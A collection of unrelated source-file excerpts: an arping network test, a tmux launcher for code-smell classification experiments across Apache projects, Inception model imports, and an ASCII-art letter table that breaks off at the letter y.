# --- File: tcpy/tests/arp_test.py (repo: sfluor/tcpy, license: MIT) ---
from .utils import run_cmd_with_stack
def test_arping() -> None:
# Calling arping
run_cmd_with_stack(["arping", "-c3", "-I", "tap0", "10.0.0.4"])
# --- File: deployment.py (repo: Bruno81930/smells, license: MIT) ---
from time import sleep
import libtmux
from alive_progress import alive_bar
from libtmux import Session
import numpy as np
class BaseApproach:
def __init__(self):
self.projects = ['accumulo', 'activemq', 'activemq-artemis', 'airavata', 'archiva', 'asterixdb', 'atlas',
'avro', 'beam', 'bookkeeper', 'calcite', 'camel', 'carbondata', 'cassandra', 'cayenne',
'clerezza', 'cocoon', 'commons-beanutils', 'commons-cli', 'commons-codec',
'commons-collections', 'commons-compress', 'commons-csv', 'commons-dbcp', 'commons-email',
'commons-io', 'commons-jexl', 'commons-lang', 'commons-math', 'commons-net',
'commons-validator', 'commons-vfs', 'continuum', 'crunch', 'curator', 'cxf', 'deltaspike',
'directory-kerby', 'directory-server', 'directory-studio', 'drill', 'flink', 'giraph',
'hadoop', 'hbase', 'helix', 'hive', 'isis', 'jackrabbit', 'jackrabbit-oak', 'jclouds', 'jena',
'johnzon', 'juneau', 'kafka', 'karaf', 'knox', 'kylin', 'lucene-solr', 'manifoldcf', 'maven',
'maven-surefire', 'metron', 'myfaces', 'myfaces-tobago', 'nifi', 'nutch', 'ofbiz',
'olingo-odata4', 'openjpa', 'openmeetings', 'opennlp', 'openwebbeans', 'parquet-mr', 'phoenix',
'plc4x', 'pulsar', 'qpid-jms', 'ranger', 'reef', 'roller', 'samza', 'santuario-java',
'servicecomb-java-chassis', 'shiro', 'storm', 'struts', 'syncope', 'systemml', 'tajo',
'tapestry-5', 'tez', 'tika', 'tinkerpop', 'tomcat', 'tomee', 'uima-ruta', 'wicket',
'xmlgraphics-fop', 'zeppelin']
self.classifiers = ["rf", "svc", "mp", "dt", "nb"]
self.approaches = {"std": False, "train": False, "test": False, "knn": True, "best": False, "elm": False}
self.base_dir = "/home/machadob/PycharmProjects/smells"
self.base_cmds = [
"conda activate smells",
"source env/bin/activate"
]
@staticmethod
def cmd(dataset, classifier, approach, project, nocache):
project_cmd = ' '.join([f"-p {p}" for p in project])
classifier_cmd = ' '.join([f"-c {c}" for c in classifier])
nocache_cmd = '--nocache' if nocache else ''
cmd = f"python crossproject.py -d {dataset} {classifier_cmd} -a {approach} {project_cmd} {nocache_cmd}"
print(cmd)
return cmd
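# BaseApproach.cmd above joins repeated -c/-p flags into one crossproject.py
# invocation that gets typed into a tmux pane. A minimal standalone sketch of
# the same string assembly (the name build_cmd and the sample dataset,
# classifier, and project values are illustrative, not part of this repo):

```python
# Standalone sketch of BaseApproach.cmd: assemble the crossproject.py
# command line from dataset, classifiers, approach, and project names.
def build_cmd(dataset, classifiers, approach, projects, nocache):
    classifier_cmd = ' '.join(f"-c {c}" for c in classifiers)
    project_cmd = ' '.join(f"-p {p}" for p in projects)
    nocache_cmd = '--nocache' if nocache else ''
    cmd = f"python crossproject.py -d {dataset} {classifier_cmd} -a {approach} {project_cmd} {nocache_cmd}"
    return cmd.rstrip()  # drop the trailing space left when nocache is False

# e.g. build_cmd("smells", ["rf", "nb"], "std", ["camel", "cxf"], False)
# -> "python crossproject.py -d smells -c rf -c nb -a std -p camel -p cxf"
```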
class Approach(BaseApproach):
def __init__(self, dataset, approach, ignore=None, ignore_clfs=None, enabled=True):
super().__init__()
self.dataset = dataset
assert approach in list(self.approaches.keys()), "Wrong approach."
self.approach = approach
self.session_name = f"{dataset}_{approach}"
self.nocache = self.approaches[approach]
if ignore is not None:
assert all(project in self.projects for project in ignore)
self.projects = list(filter(lambda project: project not in ignore, self.projects))
if ignore_clfs is not None:
assert all(ignore_clf in self.classifiers for ignore_clf in ignore_clfs)
self.classifiers = list(filter(lambda clf: clf not in ignore_clfs, self.classifiers))
self.enabled = enabled
def __call__(self, server):
self.server = server
session_name = f"{self.session_name}"
print(session_name)
if not self.server.has_session(session_name):
self.session: Session = self.server.new_session(session_name)
else:
self.session = self.server.find_where({"session_name": session_name})
self.window = self.session.select_window(0)
if self.approach == "knn" or self.approach == "best":
self.run(0, self.classifiers)
else:
[self.run(num, [classifier]) for num, classifier in enumerate(self.classifiers)]
self.window.select_layout("tiled")
def run(self, num, classifiers):
vertical = num % 2 == 0
pane = self.window.split_window(start_directory=self.base_dir, vertical=vertical)
for cmd in self.base_cmds:
pane.send_keys(cmd)
cmd_args = {"dataset": self.dataset, "classifier": classifiers, "approach": self.approach,
"project": self.projects,
"nocache": self.nocache}
keys = self.cmd(**cmd_args)
if self.enabled:
pane.send_keys(keys)
class KNN(Approach):
def __init__(self, dataset, n_processes=10, ignore=None, enabled=True):
super().__init__(dataset, "knn", ignore=ignore, enabled=enabled)
self.dataset = dataset
self.subprojects = np.array_split(self.projects, n_processes)
self.session_names = [f"{dataset}_knn_{process}" for process in range(n_processes)]
def __call__(self, server):
self.server = server
for name, projects in zip(self.session_names, self.subprojects):
self.session_name = f"tmp_{name}"
self.projects = projects
super().__call__(server)
class BestOfBreed(Approach):
def __init__(self, dataset, n_processes=20, ignore=None, enabled=True):
super().__init__(dataset, "best", ignore=ignore, enabled=enabled)
self.dataset = dataset
self.subprojects = np.array_split(self.projects, n_processes)
self.session_names = [f"{dataset}_best_breed_{process}" for process in range(n_processes)]
def __call__(self, server):
self.server = server
for name, projects in zip(self.session_names, self.subprojects):
self.session_name = f"tmp_{name}"
self.projects = projects
super().__call__(server)
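# KNN and BestOfBreed shard the project list across tmux sessions with
# np.array_split, which (unlike np.split) accepts a section count that does
# not divide the list evenly. A small sketch of that sharding behaviour
# (the five project names are just a sample from the list above):

```python
import numpy as np

# np.array_split gives the first len(projects) % n shards one extra item,
# so 5 projects over 2 worker sessions become shards of size 3 and 2.
projects = ['accumulo', 'activemq', 'airavata', 'archiva', 'avro']
shards = [list(chunk) for chunk in np.array_split(projects, 2)]
# -> [['accumulo', 'activemq', 'airavata'], ['archiva', 'avro']]
```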
metrics_smells = BestOfBreed("smells_metrics", n_processes=10,
ignore=['accumulo', 'activemq', 'activemq-artemis', 'airavata', 'archiva', 'asterixdb',
'atlas', 'avro', 'beam', 'bookkeeper', 'calcite', 'camel', 'carbondata',
'cassandra', 'cayenne', 'clerezza', 'cocoon', 'commons-beanutils', 'commons-cli',
'commons-codec', 'commons-collections', 'commons-compress', 'commons-csv',
'commons-dbcp', 'commons-email', 'commons-io', 'commons-jexl', 'commons-lang',
'commons-math', 'commons-net', 'commons-validator', 'commons-vfs', 'continuum',
'crunch', 'curator', 'cxf', 'deltaspike', 'directory-kerby', 'directory-server',
'directory-studio', 'drill', 'flink', 'giraph', 'hadoop', 'hbase', 'jclouds',
'jena', 'johnzon', 'juneau', 'kafka', 'karaf', 'knox', 'kylin', 'lucene-solr',
'manifoldcf', 'maven', 'maven-surefire', 'metron', 'myfaces', 'myfaces-tobago',
'openmeetings', 'opennlp', 'openwebbeans', 'parquet-mr', 'phoenix', 'plc4x',
'pulsar', 'qpid-jms', 'ranger', 'reef', 'roller', 'samza', 'santuario-java',
'servicecomb-java-chassis', 'shiro', 'storm', 'struts', 'syncope', 'systemml',
'tajo', 'tapestry-5', 'tez', 'tika', 'tinkerpop', 'tomcat', 'tomee', 'uima-ruta',
'wicket', 'xmlgraphics-fop', 'zeppelin'])
metrics_1 = BestOfBreed("metrics", n_processes=15,
ignore=['accumulo', 'activemq', 'activemq-artemis', 'airavata', 'archiva', 'calcite', 'camel',
'carbondata', 'cassandra', 'cayenne', 'commons-collections', 'commons-compress',
'commons-csv', 'commons-dbcp', 'commons-email', 'commons-validator', 'commons-vfs',
'continuum', 'crunch', 'curator', 'drill', 'flink', 'giraph', 'hadoop', 'hbase',
'jclouds', 'jena', 'johnzon', 'juneau', 'kafka', 'maven', 'maven-surefire', 'metron',
'myfaces', 'myfaces-tobago', 'nifi', 'nutch', 'ofbiz', 'olingo-odata4', 'openjpa',
'openmeetings', 'opennlp', 'openwebbeans', 'parquet-mr', 'phoenix', 'plc4x', 'pulsar',
'qpid-jms', 'ranger', 'reef', 'roller', 'samza', 'santuario-java',
'servicecomb-java-chassis', 'shiro', 'storm', 'struts', 'syncope', 'systemml', 'tajo',
'tapestry-5', 'tez', 'tika', 'tinkerpop', 'tomcat', 'tomee', 'uima-ruta', 'wicket',
'xmlgraphics-fop', 'zeppelin']
)
metrics_2 = BestOfBreed("metrics", n_processes=2,
ignore=['uima-ruta', 'xmlgraphics-fop', 'accumulo', 'activemq', 'activemq-artemis', 'airavata',
'archiva', 'asterixdb', 'atlas', 'avro', 'beam', 'bookkeeper', 'calcite', 'camel',
'carbondata', 'cassandra', 'cayenne', 'clerezza', 'commons-cli', 'commons-codec',
'commons-collections', 'commons-compress', 'commons-csv', 'commons-dbcp',
'commons-email',
'commons-io', 'commons-jexl', 'commons-lang', 'commons-math', 'commons-net',
'commons-validator', 'commons-vfs', 'continuum', 'crunch', 'curator', 'cxf',
'deltaspike', 'directory-kerby', 'directory-server', 'directory-studio', 'drill',
'flink', 'giraph', 'hadoop', 'hbase', 'helix', 'hive', 'isis', 'jackrabbit',
'jackrabbit-oak', 'jclouds', 'jena', 'johnzon', 'juneau', 'kafka', 'karaf', 'knox',
'kylin', 'lucene-solr', 'manifoldcf', 'maven', 'maven-surefire', 'metron', 'myfaces',
'myfaces-tobago', 'nifi', 'nutch', 'ofbiz', 'olingo-odata4', 'openjpa', 'openmeetings',
'opennlp', 'openwebbeans', 'parquet-mr', 'phoenix', 'plc4x', 'pulsar', 'qpid-jms',
'ranger', 'reef', 'roller', 'samza', 'santuario-java', 'servicecomb-java-chassis',
'shiro', 'storm', 'struts', 'syncope', 'systemml', 'tajo', 'tapestry-5', 'tez', 'tika',
'tinkerpop', 'tomcat', 'tomee', 'wicket', 'zeppelin'])
smells = BestOfBreed("smells", n_processes=15,
ignore=['accumulo', 'activemq', 'activemq-artemis', 'airavata', 'archiva', 'asterixdb', 'atlas',
'avro', 'beam', 'bookkeeper', 'calcite', 'camel', 'carbondata', 'cassandra', 'cayenne',
'clerezza', 'cocoon', 'commons-beanutils', 'commons-cli', 'commons-codec',
'commons-collections', 'commons-compress', 'commons-csv', 'commons-dbcp', 'commons-email',
'commons-io', 'commons-jexl', 'commons-lang', 'commons-math', 'commons-net',
'commons-validator', 'commons-vfs', 'continuum', 'crunch', 'curator', 'cxf', 'deltaspike',
'directory-kerby', 'directory-server', 'directory-studio', 'helix', 'hive', 'isis',
'jackrabbit', 'jackrabbit-oak', 'jclouds', 'jena', 'johnzon', 'juneau', 'kafka', 'karaf',
'knox', 'kylin', 'lucene-solr', 'manifoldcf', 'maven', 'maven-surefire', 'metron',
'myfaces', 'myfaces-tobago', 'nifi', 'nutch', 'ofbiz', 'olingo-odata4', 'openjpa', 'plc4x',
'pulsar', 'qpid-jms', 'ranger', 'reef', 'roller', 'samza', 'santuario-java',
'servicecomb-java-chassis', 'shiro', 'storm', 'struts', 'syncope', 'systemml', 'tajo',
'tomee', 'uima-ruta', 'wicket', 'xmlgraphics-fop', 'zeppelin'])
# metrics_knn = KNN("metrics", ignore=['commons-cli', 'commons-codec', 'commons-collections', 'commons-compress', 'commons-csv', 'commons-dbcp', 'commons-email', 'commons-io', 'commons-jexl', 'commons-lang', 'commons-net', 'crunch', 'myfaces', 'myfaces-tobago', 'parquet-mr', 'samza', 'santuario-java', 'servicecomb-java-chassis', 'shiro'])
# smells_knn = KNN("smells", n_processes=4, ignore=['accumulo', 'activemq', 'activemq-artemis', 'airavata', 'archiva', 'asterixdb', 'atlas', 'avro', 'beam', 'bookkeeper', 'calcite', 'camel', 'carbondata', 'cassandra', 'cayenne', 'clerezza', 'cocoon', 'commons-beanutils', 'commons-cli', 'commons-codec', 'commons-collections', 'commons-compress', 'commons-csv', 'commons-dbcp', 'commons-email', 'commons-io', 'commons-jexl', 'commons-lang', 'commons-math', 'commons-net', 'commons-validator', 'commons-vfs', 'continuum', 'crunch', 'curator', 'cxf', 'deltaspike', 'directory-kerby', 'directory-server', 'directory-studio', 'drill', 'flink', 'giraph', 'hadoop', 'hbase', 'helix', 'hive', 'isis', 'jackrabbit', 'jackrabbit-oak', 'jclouds', 'jena', 'johnzon', 'juneau', 'kafka', 'karaf', 'knox', 'kylin', 'lucene-solr', 'manifoldcf', 'maven', 'maven-surefire', 'metron', 'myfaces', 'myfaces-tobago', 'nifi', 'nutch', 'ofbiz', 'olingo-odata4', 'openjpa', 'openmeetings', 'opennlp', 'openwebbeans', 'parquet-mr', 'phoenix', 'plc4x', 'pulsar', 'qpid-jms', 'ranger', 'reef', 'roller', 'samza', 'santuario-java', 'servicecomb-java-chassis', 'shiro', 'storm', 'struts', 'syncope', 'systemml', 'tajo', 'tapestry-5', 'tez', 'tika', 'tinkerpop', 'tomcat', 'zeppelin'])
# metrics_train = Approach("metrics",
# "train",
# ['accumulo', 'activemq', 'activemq-artemis', 'airavata', 'archiva', 'asterixdb', 'atlas',
# 'avro', 'beam', 'bookkeeper', 'calcite', 'camel', 'carbondata', 'cassandra', 'cayenne',
# 'clerezza',
# 'cocoon', 'commons-beanutils', 'commons-cli', 'commons-codec', 'commons-collections',
# 'commons-compress', 'commons-csv', 'commons-dbcp', 'commons-email', 'commons-io',
# 'commons-jexl', 'commons-lang', 'commons-math', 'commons-validator',
# 'commons-vfs', 'continuum', 'crunch', 'curator', 'cxf', 'deltaspike', 'directory-kerby',
# 'directory-server', 'directory-studio', 'drill', 'flink', 'giraph', 'hadoop', 'hbase',
# 'helix', 'hive', 'isis', 'jackrabbit', 'jackrabbit-oak', 'jclouds', 'jena', 'johnzon',
# 'juneau', 'kafka', 'karaf', 'knox', 'kylin', 'lucene-solr', 'manifoldcf', 'maven',
# 'maven-surefire', 'metron', 'myfaces', 'myfaces-tobago', 'nifi', 'nutch', 'ofbiz',
# 'olingo-odata4', 'openjpa', 'openmeetings', 'opennlp', 'openwebbeans', 'parquet-mr',
# 'phoenix', 'plc4x', 'pulsar', 'qpid-jms', 'ranger', 'reef', 'roller', 'samza',
# 'santuario-java', 'servicecomb-java-chassis', 'shiro', 'storm', 'struts', 'syncope',
# 'systemml', 'tajo', 'tapestry-5', 'tez', 'tika', 'tinkerpop', 'tomcat', 'tomee', 'uima-ruta',
# 'wicket', 'xmlgraphics-fop', 'zeppelin'],
# ["rf", "svc", "dt", "nb"]
# )
# smells_metrics_std = Approach("smells_metrics", "std")
# smells_metrics_train = Approach("smells_metrics", "train")
# smells_metrics_test = Approach("smells_metrics", "test")
# smells_metrics_knn = KNN("smells_metrics", ignore=['accumulo', 'activemq', 'activemq-artemis', 'airavata', 'archiva', 'asterixdb', 'atlas', 'avro', 'beam', 'bookkeeper', 'calcite', 'camel', 'carbondata', 'cassandra', 'cayenne', 'clerezza', 'cocoon', 'commons-beanutils', 'commons-cli', 'commons-codec', 'commons-collections', 'commons-compress', 'commons-csv', 'commons-dbcp', 'commons-email', 'commons-io', 'commons-jexl', 'commons-lang', 'commons-math', 'commons-net', 'commons-validator', 'commons-vfs', 'curator', 'cxf', 'deltaspike', 'directory-kerby', 'directory-server', 'johnzon', 'maven', 'maven-surefire', 'metron', 'myfaces', 'myfaces-tobago', 'olingo-odata4', 'shiro', 'storm', 'struts', 'syncope', 'tika'])
# smells_metrics_best = Approach("smells_metrics", "best")
# smells_elm = Approach("smells", "elm", ignore_clfs=["svc", "mp", "dt", "nb"])
# metrics_elm = Approach("metrics", "elm", ignore=['accumulo', 'activemq', 'activemq-artemis', 'airavata', 'archiva', 'asterixdb', 'atlas', 'avro', 'beam', 'bookkeeper', 'calcite', 'camel', 'carbondata', 'cassandra', 'cayenne', 'clerezza', 'cocoon', 'commons-beanutils', 'commons-cli', 'commons-codec', 'commons-collections', 'commons-compress', 'commons-csv', 'commons-dbcp', 'commons-email', 'commons-io', 'commons-jexl', 'commons-lang', 'commons-math', 'commons-net', 'commons-validator', 'commons-vfs', 'continuum', 'crunch', 'curator', 'cxf', 'deltaspike', 'directory-kerby', 'directory-server', 'directory-studio', 'drill', 'flink', 'giraph', 'hadoop', 'hbase', 'helix', 'hive', 'isis', 'jackrabbit', 'jackrabbit-oak', 'jclouds', 'jena', 'johnzon', 'juneau', 'kafka', 'karaf', 'knox', 'kylin', 'lucene-solr', 'manifoldcf', 'maven', 'maven-surefire', 'metron', 'myfaces', 'myfaces-tobago', 'nifi', 'nutch', 'ofbiz', 'olingo-odata4', 'openjpa', 'openmeetings', 'opennlp', 'openwebbeans', 'parquet-mr', 'phoenix', 'plc4x', 'pulsar', 'qpid-jms', 'ranger', 'reef', 'roller', 'samza', 'santuario-java', 'servicecomb-java-chassis', 'storm', 'struts', 'syncope', 'systemml', 'tajo', 'tapestry-5', 'tez', 'tika', 'tomcat', 'tomee', 'uima-ruta', 'wicket', 'xmlgraphics-fop', 'zeppelin'], ignore_clfs=["svc", "mp", "dt", "nb"], enabled=True)
# smells_metrics_elm = Approach("smells_metrics", "elm", ignore_clfs=["svc", "mp", "dt", "nb"])
# special_knn = KNN("metrics", n_processes=20, ignore=['accumulo', 'bookkeeper', 'commons-beanutils', 'commons-cli', 'commons-codec', 'commons-collections', 'commons-compress', 'commons-csv', 'commons-dbcp', 'commons-email', 'commons-io', 'commons-jexl', 'commons-lang', 'commons-math', 'commons-net', 'commons-validator', 'commons-vfs', 'continuum', 'crunch', 'curator', 'directory-kerby', 'directory-server', 'helix', 'maven-surefire', 'metron', 'myfaces', 'myfaces-tobago', 'opennlp', 'openwebbeans', 'parquet-mr', 'phoenix', 'plc4x', 'roller', 'samza', 'santuario-java', 'servicecomb-java-chassis', 'shiro', 'storm', 'tika', 'tinkerpop', 'activemq', 'calcite', 'directory-studio', 'hive', 'kafka', 'nifi', 'pulsar', 'struts', 'tomcat'])
# smells_std = Approach("smells", "std")
# smells_train = Approach("smells", "train")
# smells_test = Approach("smells", "test")
# smells_best = Approach("smells", "best")
# smells_knn = KNN("smells", n_processes=20)
# smells_elm = Approach("smells", "elm", ignore_clfs=["svc", "mp", "dt", "nb"])
#
# metrics_std = Approach("metrics", "std")
# metrics_train = Approach("metrics", "train")
# metrics_test = Approach("metrics", "test")
# metrics_best = Approach("metrics", "best")
# # metrics_knn = KNN("metrics")
# metrics_elm = Approach("metrics", "elm", ignore_clfs=["svc", "mp", "dt", "nb"])
#
# smells_metrics_std = Approach("smells_metrics", "std")
# smells_metrics_train = Approach("smells_metrics", "train")
# smells_metrics_test = Approach("smells_metrics", "test")
# smells_metrics_knn = KNN("smells_metrics", n_processes=20)
# smells_metrics_best = Approach("smells_metrics", "best")
# smells_metrics_elm = Approach("smells_metrics", "elm", ignore_clfs=["svc", "mp", "dt", "nb"])
#
# broke_knn = KNN("metrics", n_processes=3,
# ignore=['accumulo', 'activemq', 'activemq-artemis', 'airavata', 'archiva', 'asterixdb', 'atlas',
# 'avro', 'beam', 'bookkeeper', 'calcite', 'camel', 'carbondata', 'cassandra', 'cayenne',
# 'clerezza', 'cocoon', 'commons-beanutils', 'commons-cli', 'commons-codec',
# 'commons-collections', 'commons-compress', 'commons-csv', 'commons-dbcp', 'commons-email',
# 'commons-io', 'commons-jexl', 'commons-lang', 'commons-math', 'commons-net',
# 'commons-validator', 'commons-vfs', 'continuum', 'crunch', 'curator', 'cxf', 'deltaspike',
# 'directory-kerby', 'directory-server', 'directory-studio', 'drill', 'flink', 'giraph',
# 'helix', 'hive', 'jackrabbit', 'jackrabbit-oak', 'jclouds',
# 'jena',
# 'johnzon', 'juneau', 'kafka', 'karaf', 'knox', 'kylin', 'lucene-solr', 'manifoldcf',
# 'maven',
# 'maven-surefire', 'metron', 'myfaces', 'myfaces-tobago', 'nifi', 'nutch', 'ofbiz',
# 'olingo-odata4', 'openjpa', 'openmeetings', 'opennlp', 'openwebbeans', 'parquet-mr',
# 'phoenix',
# 'plc4x', 'pulsar', 'qpid-jms', 'ranger', 'reef', 'roller', 'samza', 'santuario-java',
# 'servicecomb-java-chassis', 'shiro', 'storm', 'struts', 'syncope', 'systemml', 'tajo',
# 'tapestry-5', 'tez', 'tika', 'tinkerpop', 'tomcat', 'tomee', 'uima-ruta', 'wicket',
# 'xmlgraphics-fop', 'zeppelin'])
#
# metrics_20_ignore = ['jclouds', 'jena', 'johnzon', 'juneau', 'kafka', 'karaf', 'knox', 'kylin', 'lucene-solr',
# 'manifoldcf', 'maven', 'maven-surefire', 'metron', 'myfaces', 'myfaces-tobago', 'nifi', 'nutch',
# 'ofbiz', 'olingo-odata4', 'openjpa', 'openmeetings', 'opennlp', 'openwebbeans', 'parquet-mr',
# 'phoenix', 'plc4x', 'pulsar', 'qpid-jms', 'ranger', 'reef', 'roller', 'samza', 'santuario-java',
# 'servicecomb-java-chassis', 'shiro', 'storm', 'struts', 'syncope', 'systemml', 'tajo',
# 'tapestry-5', 'tez', 'tika', 'tinkerpop', 'tomcat', 'tomee', 'uima-ruta', 'wicket',
# 'xmlgraphics-fop', 'zeppelin']
#
# metrics_21_ignore = ['accumulo', 'activemq', 'activemq-artemis', 'airavata', 'archiva', 'asterixdb',
# 'atlas', 'avro', 'beam', 'bookkeeper', 'calcite', 'camel', 'carbondata',
# 'cassandra', 'cayenne', 'clerezza', 'cocoon', 'commons-beanutils',
# 'commons-cli', 'commons-codec', 'commons-collections', 'commons-compress',
# 'commons-csv', 'commons-dbcp', 'commons-email', 'commons-io', 'commons-jexl',
# 'commons-lang', 'commons-math', 'commons-net', 'commons-validator',
# 'commons-vfs', 'continuum', 'crunch', 'curator', 'cxf', 'deltaspike',
# 'directory-kerby', 'directory-server', 'directory-studio', 'drill', 'flink',
# 'giraph', 'hadoop', 'hbase', 'helix', 'hive', 'isis', 'jackrabbit',
# 'jackrabbit-oak']
#
# ise_20_metrics = KNN("metrics", n_processes=20, ignore=metrics_20_ignore)
# ise_21_metrics = KNN("metrics", n_processes=20, ignore=metrics_21_ignore)
#
# standard_problem = Approach("smells", "std",
# ignore=['accumulo', 'activemq', 'activemq-artemis', 'airavata', 'archiva', 'asterixdb',
# 'atlas', 'avro', 'beam', 'bookkeeper', 'calcite', 'camel', 'carbondata',
# 'cassandra', 'cayenne', 'clerezza', 'cocoon', 'commons-beanutils', 'commons-cli',
# 'commons-codec', 'commons-collections', 'commons-compress', 'commons-csv',
# 'commons-dbcp', 'commons-email', 'commons-io', 'commons-jexl', 'commons-lang',
# 'commons-math', 'commons-net', 'commons-validator', 'commons-vfs', 'continuum',
# 'crunch', 'curator', 'cxf', 'deltaspike', 'directory-kerby', 'directory-server',
# 'directory-studio', 'drill', 'flink', 'giraph', 'hadoop', 'hbase', 'helix', 'hive',
# 'isis', 'jackrabbit', 'jackrabbit-oak', 'jclouds', 'jena', 'johnzon', 'juneau',
# 'kafka', 'karaf', 'knox', 'kylin', 'lucene-solr', 'manifoldcf', 'maven',
# 'maven-surefire', 'metron', 'myfaces', 'myfaces-tobago', 'nifi', 'nutch', 'ofbiz',
# 'olingo-odata4', 'openjpa', 'openmeetings', 'opennlp', 'openwebbeans', 'parquet-mr',
# 'phoenix', 'plc4x', 'pulsar', 'qpid-jms', 'ranger', 'reef', 'roller', 'samza',
# 'santuario-java',
# 'servicecomb-java-chassis'],
# ignore_clfs=["rf", "mp", "dt", "nb"])
modules = [
    # metrics_smells,
    # smells,
    metrics_2,
    # metrics_smells
]

ISE2020 = libtmux.Server()
# Launch each enabled module against the shared tmux server; a plain loop is
# clearer than a list comprehension used only for its side effects.
for module in modules:
    module(ISE2020)
# --- utils/slim_nets/inception.py (repo: SMH17/TensorBoxPy3, licenses: Apache-2.0, MIT) ---
# TensorBoxPy3 https://github.com/SMH17/TensorBoxPy3
"""Brings all inception models under one namespace."""
# pylint: disable=unused-import
from utils.slim_nets.inception_resnet_v2 import inception_resnet_v2
from utils.slim_nets.inception_resnet_v2 import inception_resnet_v2_arg_scope
from utils.slim_nets.inception_v1 import inception_v1
from utils.slim_nets.inception_v1 import inception_v1_arg_scope
from utils.slim_nets.inception_v1 import inception_v1_base
from utils.slim_nets.inception_v2 import inception_v2
from utils.slim_nets.inception_v2 import inception_v2_arg_scope
from utils.slim_nets.inception_v2 import inception_v2_base
from utils.slim_nets.inception_v3 import inception_v3
from utils.slim_nets.inception_v3 import inception_v3_arg_scope
from utils.slim_nets.inception_v3 import inception_v3_base
from utils.slim_nets.inception_v4 import inception_v4
from utils.slim_nets.inception_v4 import inception_v4_arg_scope
from utils.slim_nets.inception_v4 import inception_v4_base
# pylint: enable=unused-import
# --- alphabet.py (repo: matteogabburo/AsciiWords, license: MIT) ---
#!/bin/python3
c_a = [
[0, 1, 1, 1, 1, 0],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1]
]
c_b = [
[1, 1, 1, 1, 1, 0],
[1, 1, 0, 0, 0, 1],
[1, 1, 1, 1, 1, 0],
[1, 1, 0, 0, 0, 1],
[1, 1, 1, 1, 1, 0]
]
c_c = [
[0, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 1]
]
c_d = [
[1, 1, 1, 1, 0, 0],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 0, 0]
]
c_e = [
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1]
]
c_f = [
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0]
]
c_g = [
[0, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 1, 1, 1],
[1, 1, 0, 0, 0, 1],
[0, 1, 1, 1, 1, 0]
]
c_h = [
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1]
]
c_i = [
[0, 1, 1, 0],
[0, 1, 1, 0],
[0, 1, 1, 0],
[0, 1, 1, 0],
[0, 1, 1, 0]
]
c_j = [
[0, 0, 1, 1, 1, 0],
[0, 0, 0, 1, 1, 0],
[0, 0, 0, 1, 1, 0],
[1, 1, 0, 1, 1, 0],
[1, 1, 1, 1, 1, 0]
]
c_k = [
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 1, 0, 0],
[1, 1, 1, 1, 0, 0],
[1, 1, 0, 1, 0, 0],
[1, 1, 0, 0, 1, 1]
]
c_l = [
[1, 1, 0, 0, 0],
[1, 1, 0, 0, 0],
[1, 1, 0, 0, 0],
[1, 1, 0, 0, 0],
[1, 1, 1, 1, 1]
]
c_m = [
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1]
]
c_n = [
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 0, 1, 1],
[1, 1, 0, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1]
]
c_o = [
[0, 1, 1, 1, 1, 0],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[0, 1, 1, 1, 1, 0]
]
c_p = [
[1, 1, 1, 1, 1, 0],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0]
]
c_q = [
[0, 1, 1, 1, 1, 0, 0],
[1, 1, 0, 0, 1, 1, 0],
[1, 1, 0, 0, 1, 1, 0],
[1, 1, 0, 0, 1, 1, 0],
[0, 1, 1, 1, 0, 1, 1]
]
c_r = [
[1, 1, 1, 1, 1, 0],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 0],
[1, 1, 0, 0, 1, 0],
[1, 1, 0, 0, 0, 1]
]
c_s = [
[0, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 0]
]
c_t = [
[1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0]
]
c_u = [
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[0, 1, 1, 1, 1, 0]
]
c_v = [
[1, 0, 0, 0, 0, 1],
[1, 1, 0, 0, 1, 1],
[0, 1, 0, 0, 1, 0],
[0, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 0, 0]
]
c_w = [
[1, 1, 0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 1, 1],
[1, 1, 0, 1, 1, 0, 1, 1],
[1, 1, 1, 0, 0, 1, 1, 1],
[1, 1, 0, 0, 0, 0, 1, 1]
]
c_x = [
[1, 1, 0, 0, 0, 0, 1, 1],
[0, 1, 1, 0, 0, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 0, 0, 1, 1, 0],
[1, 1, 0, 0, 0, 0, 1, 1]
]
c_y = [
[1, 1, 0, 0, 0, 0, 1, 1],
[0, 1, 1, 0, 0, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0],
